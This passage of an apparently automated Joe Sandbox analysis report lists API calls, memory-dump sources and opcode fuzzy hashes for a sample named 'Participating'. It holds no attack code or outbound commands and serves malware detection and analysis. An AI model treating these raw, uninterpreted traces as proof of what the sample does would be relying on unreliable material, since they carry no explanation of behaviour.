                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D47BB4
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D47C36
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D748D1
                                                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00D748E6
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D7492E
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00D74941
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 6bf47a3ba5ec5e6e43aa3a8127547b576194b78e4f21e949796831a1ad0fbf1c
                                                                                                                                                                                                                                                                  • Instruction ID: 6a1c1b5b4c7235fc8a0598b4f6027add4e059958e22285beaf172778598f6fc8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bf47a3ba5ec5e6e43aa3a8127547b576194b78e4f21e949796831a1ad0fbf1c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54412775A01209EFDB11CF95D884AABBBB9FF06324F088129EA5997350E730ED44CF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D427B3
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D427C6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D427F6
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 6aa57cd072c0d673232aac2b3a3182019c5d3e13306c9c92874b9136500ffa11
                                                                                                                                                                                                                                                                  • Instruction ID: 27b741f4884dbf0e83d223af7cd9c7d7f50315502378f433dc151e3ec156ac61
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aa57cd072c0d673232aac2b3a3182019c5d3e13306c9c92874b9136500ffa11
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4212171900204BFDB09ABA0CC46DFFBBB9DF45360B444129F426A32E0DB34894A9670
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D73A29
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00D73A30
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D73A45
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D73A4D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                                                                                                                  • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                  • Opcode ID: be93588b6d97906036be4165beffc84f742d7775d33e2f681ccaf329ab73230d
                                                                                                                                                                                                                                                                  • Instruction ID: 5fa4c6718e420fe636215df8207c0313d237ec72559eba21e0634005fcfea506
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be93588b6d97906036be4165beffc84f742d7775d33e2f681ccaf329ab73230d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51219D71600309AFEB109F64DC82EBB77A9EF45364F149218FA99D2190E771CD91AB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D0508E,?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002), ref: 00D050FD
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D05110
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00D0508E,?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05133
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 91e075486a19c4557ed64dcd66fa5dbce80cccae5caa060bd0bfe87cc64f9fed
                                                                                                                                                                                                                                                                  • Instruction ID: 3c209597fc44ab3b932975acc9713df8cb7256aca6f1d2ac9c07c9baf3faf9c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91e075486a19c4557ed64dcd66fa5dbce80cccae5caa060bd0bfe87cc64f9fed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F03134900708BBDB119F94DC49BAEBFB9EF44752F440068B809E22A0DB745995CAB5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE664A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CE665C
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE666E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6610
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CE6622
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6635
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D535C4
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00D53646
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D5365C
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D5366D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D5367F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D6AE87
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D6AE95
                                                                                                                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D6AEC8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6B09D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C505
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C560
                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D6C5C3
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00D6C606
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C613
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 826366716-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7a1d9a2a3564240a5d3b26857c8c48dd1bd981242660d14fcad3c7079b5fed26
                                                                                                                                                                                                                                                                  • Instruction ID: b8f958b26e59aeb47c45c66cf2d83989181af2b736818fcd49f74926953437ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a1d9a2a3564240a5d3b26857c8c48dd1bd981242660d14fcad3c7079b5fed26
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE617F31218241AFD714DF54C890E3ABBE5FF84308F54955CF49A8B2A2DB31ED46CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D4D7CD,?), ref: 00D4E714
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D4D7CD,?), ref: 00D4E72D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00D4ED8A
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4EDC3
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4EF02
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4EF1A
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D4EF67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                  • Opcode ID: e394ccb9a6532feee6f5b06b4879fd6d90d2b814c4010087fbf4d71fe780f7e5
                                                                                                                                                                                                                                                                  • Instruction ID: 19b989d09ecd42b739d27e709689e9dcfa351ae37b29f32262ff814d75c7c209
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e394ccb9a6532feee6f5b06b4879fd6d90d2b814c4010087fbf4d71fe780f7e5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A15130B2408385ABC724EB54D891DDBB3ECEF94300F44092EF689D3191EF71A6888776
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D49534
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 00D495A5
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 00D49604
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D49677
                                                                                                                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D496A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                  • Opcode ID: 341eef563159f356bf2d441c549813a4fc24e3d309df2ca99ff413dde7da5ea0
                                                                                                                                                                                                                                                                  • Instruction ID: 448260971850b9374363883569b0d95b9f86263ae1afb405d3fc96145f4ef923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 341eef563159f356bf2d441c549813a4fc24e3d309df2ca99ff413dde7da5ea0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B45139B5A00619AFCB14CF59C894EAAB7F9FF89314B158559F909DB310E730E911CFA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D595F3
                                                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00D5961F
                                                                                                                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D59677
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D5969C
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D596A4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4347ce103e4c663658231e9b48e97bdef4fda2c6330dc68f0295cb1f1ef3e1ad
                                                                                                                                                                                                                                                                  • Instruction ID: 54b769e05f3afedf52406b973c2640e30d59e3a9c71c48fab5b271f0a9bd1137
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4347ce103e4c663658231e9b48e97bdef4fda2c6330dc68f0295cb1f1ef3e1ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55512D35A00255EFCF05DF55C891A6ABBF6FF48314F088058E849AB362DB35ED45DBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00D6999D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00D69A2D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D69A49
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00D69A8F
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00D69AAF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00D51A02,?,7735E610), ref: 00CFF9F1
